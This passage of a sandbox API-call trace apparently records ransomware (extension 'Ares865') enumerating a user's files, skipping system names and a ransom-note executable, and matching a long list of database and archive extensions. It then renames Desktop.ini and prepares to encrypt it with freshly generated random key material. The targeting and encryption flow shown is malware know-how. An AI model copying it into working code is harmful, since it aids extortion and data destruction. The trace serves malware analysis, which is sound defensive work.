lpString2="aoldtz.exe") returned -1 [0092.656] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.656] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.656] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.656] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.656] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.656] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.656] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0092.656] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0092.656] lstrlenW (lpString="Desktop.ini") returned 11 [0092.656] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned 77 [0092.656] lstrcpyW (in: lpString1=0x2cce498, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0092.656] lstrlenW (lpString="Desktop.ini") returned 11 [0092.656] lstrlenW (lpString="Ares865") returned 7 [0092.656] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.657] lstrlenW (lpString=".dll") returned 4 [0092.657] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0092.657] lstrlenW (lpString=".lnk") returned 4 [0092.657] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0092.657] lstrlenW (lpString=".ini") returned 4 [0092.657] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0092.657] lstrlenW (lpString=".sys") returned 4 [0092.657] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0092.657] lstrlenW (lpString="Desktop.ini") returned 11 [0092.657] lstrlenW (lpString="bak") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.657] lstrlenW (lpString="ba_") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.657] lstrlenW (lpString="dbb") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.657] lstrlenW (lpString="vmdk") returned 4 [0092.657] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.657] lstrlenW (lpString="rar") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.657] lstrlenW (lpString="zip") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.657] lstrlenW (lpString="tgz") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.657] lstrlenW (lpString="vbox") returned 4 [0092.657] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.657] lstrlenW (lpString="vdi") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.657] lstrlenW (lpString="vhd") returned 3 [0092.657] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.657] lstrlenW (lpString="vhdx") returned 4 [0092.657] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.657] lstrlenW (lpString="avhd") returned 4 [0092.657] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.657] lstrlenW (lpString="db") returned 2 [0092.657] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.657] lstrlenW (lpString="db2") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.658] lstrlenW (lpString="db3") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.658] lstrlenW (lpString="dbf") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.658] lstrlenW (lpString="mdf") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.658] lstrlenW (lpString="mdb") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.658] lstrlenW (lpString="sql") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.658] lstrlenW (lpString="sqlite") returned 6 [0092.658] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.658] lstrlenW (lpString="sqlite3") returned 7 [0092.658] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.658] lstrlenW (lpString="sqlitedb") returned 8 [0092.658] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.658] lstrlenW (lpString="xml") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.658] lstrlenW (lpString="$er") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.658] lstrlenW (lpString="4dd") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.658] lstrlenW (lpString="4dl") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.658] lstrlenW (lpString="^^^") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.658] lstrlenW (lpString="abs") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.658] lstrlenW (lpString="abx") returned 3 [0092.658] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.658] lstrlenW (lpString="accdb") returned 5 [0092.658] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.658] lstrlenW (lpString="accdc") returned 5 [0092.658] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.658] lstrlenW (lpString="accde") returned 5 [0092.659] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.659] lstrlenW (lpString="accdr") returned 5 [0092.659] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.659] lstrlenW (lpString="accdt") returned 5 [0092.659] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.659] lstrlenW (lpString="accdw") returned 5 [0092.659] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.659] lstrlenW (lpString="accft") returned 5 [0092.659] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.659] lstrlenW (lpString="adb") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.659] lstrlenW (lpString="adb") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.659] lstrlenW (lpString="ade") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.659] lstrlenW (lpString="adf") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.659] lstrlenW (lpString="adn") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.659] lstrlenW (lpString="adp") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.659] lstrlenW (lpString="alf") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.659] lstrlenW (lpString="ask") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.659] lstrlenW (lpString="btr") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.659] lstrlenW (lpString="cat") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.659] lstrlenW (lpString="cdb") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.659] lstrlenW (lpString="ckp") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.659] lstrlenW (lpString="cma") returned 3 [0092.659] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.659] lstrlenW (lpString="cpd") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.660] lstrlenW (lpString="dacpac") returned 6 [0092.660] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.660] lstrlenW (lpString="dad") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.660] lstrlenW (lpString="dadiagrams") returned 10 [0092.660] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.660] lstrlenW (lpString="daschema") returned 8 [0092.660] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.660] lstrlenW (lpString="db-journal") returned 10 [0092.660] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.660] lstrlenW (lpString="db-shm") returned 6 [0092.660] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.660] lstrlenW (lpString="db-wal") returned 6 [0092.660] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.660] lstrlenW (lpString="dbc") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.660] lstrlenW (lpString="dbs") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.660] lstrlenW (lpString="dbt") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.660] lstrlenW (lpString="dbv") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.660] lstrlenW (lpString="dbx") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.660] lstrlenW (lpString="dcb") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.660] lstrlenW (lpString="dct") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.660] lstrlenW (lpString="dcx") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.660] lstrlenW (lpString="ddl") returned 3 [0092.660] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.660] lstrlenW (lpString="dlis") returned 4 [0092.660] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.660] lstrlenW (lpString="dp1") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.661] lstrlenW (lpString="dqy") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.661] lstrlenW (lpString="dsk") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.661] lstrlenW (lpString="dsn") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.661] lstrlenW (lpString="dtsx") returned 4 [0092.661] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.661] lstrlenW (lpString="dxl") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.661] lstrlenW (lpString="eco") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.661] lstrlenW (lpString="ecx") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.661] lstrlenW (lpString="edb") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.661] lstrlenW (lpString="epim") returned 4 [0092.661] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.661] lstrlenW (lpString="fcd") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.661] lstrlenW (lpString="fdb") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0092.661] lstrlenW (lpString="fic") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.661] lstrlenW (lpString="flexolibrary") returned 12 [0092.661] lstrlenW (lpString="fm5") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.661] lstrlenW (lpString="fmp") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.661] lstrlenW (lpString="fmp12") returned 5 [0092.661] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.661] lstrlenW (lpString="fmpsl") returned 5 [0092.661] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.661] lstrlenW (lpString="fol") returned 3 [0092.661] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.662] lstrlenW (lpString="fp3") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.662] lstrlenW (lpString="fp4") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.662] lstrlenW (lpString="fp5") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.662] lstrlenW (lpString="fp7") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.662] lstrlenW (lpString="fpt") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.662] lstrlenW (lpString="frm") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.662] lstrlenW (lpString="gdb") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.662] lstrlenW (lpString="gdb") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.662] lstrlenW (lpString="grdb") returned 4 [0092.662] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.662] lstrlenW (lpString="gwi") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.662] lstrlenW (lpString="hdb") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.662] lstrlenW (lpString="his") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.662] lstrlenW (lpString="ib") returned 2 [0092.662] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.662] lstrlenW (lpString="idb") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.662] lstrlenW (lpString="ihx") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.662] lstrlenW (lpString="itdb") returned 4 [0092.662] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.662] lstrlenW (lpString="itw") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.662] lstrlenW (lpString="jet") returned 3 [0092.662] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.663] lstrlenW (lpString="jtx") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.663] lstrlenW (lpString="kdb") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.663] lstrlenW (lpString="kexi") returned 4 [0092.663] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.663] lstrlenW (lpString="kexic") returned 5 [0092.663] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.663] lstrlenW (lpString="kexis") returned 5 [0092.663] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.663] lstrlenW (lpString="lgc") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.663] lstrlenW (lpString="lwx") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.663] lstrlenW (lpString="maf") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.663] lstrlenW (lpString="maq") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.663] lstrlenW (lpString="mar") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.663] lstrlenW (lpString="marshal") returned 7 [0092.663] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.663] lstrlenW (lpString="mas") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.663] lstrlenW (lpString="mav") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.663] lstrlenW (lpString="maw") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.663] lstrlenW (lpString="mdbhtml") returned 7 [0092.663] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.663] lstrlenW (lpString="mdn") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.663] lstrlenW (lpString="mdt") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.663] lstrlenW (lpString="mfd") returned 3 [0092.663] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.664] lstrlenW (lpString="mpd") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.664] lstrlenW (lpString="mrg") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.664] lstrlenW (lpString="mud") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.664] lstrlenW (lpString="mwb") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.664] lstrlenW (lpString="myd") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.664] lstrlenW (lpString="ndf") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.664] lstrlenW (lpString="nnt") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.664] lstrlenW (lpString="nrmlib") returned 6 [0092.664] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.664] lstrlenW (lpString="ns2") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.664] lstrlenW (lpString="ns3") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.664] lstrlenW (lpString="ns4") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.664] lstrlenW (lpString="nsf") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.664] lstrlenW (lpString="nv") returned 2 [0092.664] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.664] lstrlenW (lpString="nv2") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.664] lstrlenW (lpString="nwdb") returned 4 [0092.664] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.664] lstrlenW (lpString="nyf") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.664] lstrlenW (lpString="odb") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.664] lstrlenW (lpString="odb") returned 3 [0092.664] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.665] lstrlenW (lpString="oqy") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.665] lstrlenW (lpString="ora") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.665] lstrlenW (lpString="orx") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.665] lstrlenW (lpString="owc") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.665] lstrlenW (lpString="p96") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.665] lstrlenW (lpString="p97") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.665] lstrlenW (lpString="pan") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.665] lstrlenW (lpString="pdb") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.665] lstrlenW (lpString="pdm") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.665] lstrlenW (lpString="pnz") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.665] lstrlenW (lpString="qry") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.665] lstrlenW (lpString="qvd") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.665] lstrlenW (lpString="rbf") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.665] lstrlenW (lpString="rctd") returned 4 [0092.665] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.665] lstrlenW (lpString="rod") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.665] lstrlenW (lpString="rodx") returned 4 [0092.665] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.665] lstrlenW (lpString="rpd") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.665] lstrlenW (lpString="rsd") returned 3 [0092.665] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.666] lstrlenW (lpString="sas7bdat") returned 8 [0092.666] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.666] lstrlenW (lpString="sbf") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.666] lstrlenW (lpString="scx") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.666] lstrlenW (lpString="sdb") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.666] lstrlenW (lpString="sdc") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.666] lstrlenW (lpString="sdf") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.666] lstrlenW (lpString="sis") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.666] lstrlenW (lpString="spq") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.666] lstrlenW (lpString="te") returned 2 [0092.666] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.666] lstrlenW (lpString="teacher") returned 7 [0092.666] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.666] lstrlenW (lpString="tmd") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.666] lstrlenW (lpString="tps") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.666] lstrlenW (lpString="trc") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.666] lstrlenW (lpString="trc") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.666] lstrlenW (lpString="trm") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.666] lstrlenW (lpString="udb") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.666] lstrlenW (lpString="udl") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.666] lstrlenW (lpString="usr") returned 3 [0092.666] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.667] lstrlenW (lpString="v12") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.667] lstrlenW (lpString="vis") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.667] lstrlenW (lpString="vpd") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.667] lstrlenW (lpString="vvv") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.667] lstrlenW (lpString="wdb") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.667] lstrlenW (lpString="wmdb") returned 4 [0092.667] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.667] lstrlenW (lpString="wrk") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.667] lstrlenW (lpString="xdb") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.667] lstrlenW (lpString="xld") returned 3 [0092.667] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.667] lstrlenW (lpString="xmlff") returned 5 [0092.667] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.667] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865") returned 95 [0092.667] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.676] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=704) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.676] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.677] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.677] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.677] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5c0, lpName=0x0) returned 0x15c [0092.677] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5c0) returned 0x190000 